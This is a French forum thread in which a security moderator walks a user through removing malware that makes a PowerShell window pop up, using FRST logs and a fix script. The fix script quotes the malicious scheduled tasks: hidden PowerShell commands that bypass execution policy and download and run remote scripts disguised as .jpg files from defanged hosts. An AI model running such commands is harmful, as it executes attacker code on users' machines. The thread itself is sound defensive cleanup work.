Fenêtre powershell
Résolu/Fermé
sandramp11
Messages postés
5
Date d'inscription
lundi 30 mai 2022
Statut
Membre
Dernière intervention
5 juin 2022
-
Modifié le 5 juin 2022 à 20:26
bazfile Messages postés 56309 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 3 novembre 2024 - 5 juin 2022 à 19:59
bazfile Messages postés 56309 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 3 novembre 2024 - 5 juin 2022 à 19:59
A voir également:
- Fenêtre powershell intempestive
- Mcafee fenetre intempestive - Accueil - Piratage
- Raccourci agrandir fenetre - Guide
- Fenêtre hors écran windows 11 - Guide
- Fenêtre - Guide
- Fenetre privée - Guide
6 réponses
bazfile
Messages postés
56309
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 novembre 2024
19 251
30 mai 2022 à 22:50
30 mai 2022 à 22:50
Bonjour.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention, attendre que les messages disant que l'analyse est terminée s'affichent
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
sandramp11
Messages postés
5
Date d'inscription
lundi 30 mai 2022
Statut
Membre
Dernière intervention
5 juin 2022
Modifié le 5 juin 2022 à 18:26
Modifié le 5 juin 2022 à 18:26
Bonjour,
Merci de votre aide.
Voici les liens générés:
https://www.cjoint.com/c/LFfqpLDXiHS
https://www.cjoint.com/c/LFfqqCyTtHS
Merci à vous
Merci de votre aide.
Voici les liens générés:
https://www.cjoint.com/c/LFfqpLDXiHS
https://www.cjoint.com/c/LFfqqCyTtHS
Merci à vous
bazfile
Messages postés
56309
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 novembre 2024
19 251
Modifié le 5 juin 2022 à 18:42
Modifié le 5 juin 2022 à 18:42
Bonjour,
Désinstalle WebAdvisor par McAfee c'est un adware.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
Désinstalle WebAdvisor par McAfee c'est un adware.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé]
Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé]
Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé]
Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex;
Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex;
Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms}
FirewallRules: [{079473BA-C039-4215-AFFA-FB367D5C5F38}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{502B5D49-C7D3-434B-96D2-BD8520312154}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{2045AC83-7DBD-4C98-B98B-6331608C961F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => Pas de fichier
FirewallRules: [{0635A61D-F21F-4A37-811D-1D8571E683E2}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{8123CDC8-3D05-4547-A7C4-8997F334712D}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{A197C030-5DA6-4603-B083-59004D41DB44}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{3B3D98D6-F91F-421C-A020-08DA14413169}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{CC5A3340-BAD1-4A8C-996B-4447948A8499}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
FirewallRules: [{1B56139A-2C80-4009-A3C8-8E96815D7466}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS
C:\ProgramData\Unlimited\ISO\Unlimited.vbs
C:\ProgramData\Error\ISO\Error.vbs
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
POUR INFORMATION:
Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
sandramp11
Messages postés
5
Date d'inscription
lundi 30 mai 2022
Statut
Membre
Dernière intervention
5 juin 2022
5 juin 2022 à 18:53
5 juin 2022 à 18:53
merci de ta réponse rapide.
Quand je vais dans le dossier mc afee pr supprimer le dossier web advisor, il ne veut pas car il me dit qu'il est ouvert ailleurs mais je ne sais pas où. Je n'ai rien pour mettre en suspens l'anti virus.
Quand je vais dans le dossier mc afee pr supprimer le dossier web advisor, il ne veut pas car il me dit qu'il est ouvert ailleurs mais je ne sais pas où. Je n'ai rien pour mettre en suspens l'anti virus.
bazfile
Messages postés
56309
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 novembre 2024
19 251
Modifié le 5 juin 2022 à 19:09
Modifié le 5 juin 2022 à 19:09
Pour webadvisor on verra ça après ce n'est pas très grave.
As-tu fait la procédure de correction FRST ?
As-tu fait la procédure de correction FRST ?
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
sandramp11
Messages postés
5
Date d'inscription
lundi 30 mai 2022
Statut
Membre
Dernière intervention
5 juin 2022
5 juin 2022 à 19:36
5 juin 2022 à 19:36
ok,
non du coup,
je m'y met
non du coup,
je m'y met
sandramp11
Messages postés
5
Date d'inscription
lundi 30 mai 2022
Statut
Membre
Dernière intervention
5 juin 2022
Modifié le 5 juin 2022 à 19:56
Modifié le 5 juin 2022 à 19:56
https://www.cjoint.com/c/LFfrThbRYrS
depuis le redémarrage, rien, affaire à suivre..
merci beaucoup en tout cas si cela a fonctionné
depuis le redémarrage, rien, affaire à suivre..
merci beaucoup en tout cas si cela a fonctionné
bazfile
Messages postés
56309
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 novembre 2024
19 251
Modifié le 5 juin 2022 à 20:00
Modifié le 5 juin 2022 à 20:00
Le fixlog est OK, tu ne devrais plus être embêté.
Par prudence change tes mots de passe en ligne ils ont pu être dérobés.
Pour WebAdvisor par McAfee tu peux le désinstaller avec Revo Uninstaller en mode scan avancé.
.
Par prudence change tes mots de passe en ligne ils ont pu être dérobés.
Pour WebAdvisor par McAfee tu peux le désinstaller avec Revo Uninstaller en mode scan avancé.
Tutoriel Revo Uninstaller à lire attentivement.
Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.
Cocher "Scan avancé" puis cliquer sur "Scan".
Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.
Pour terminer.
Si tout est OK pour toi et que ton pc fonctionne bien, tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.
.
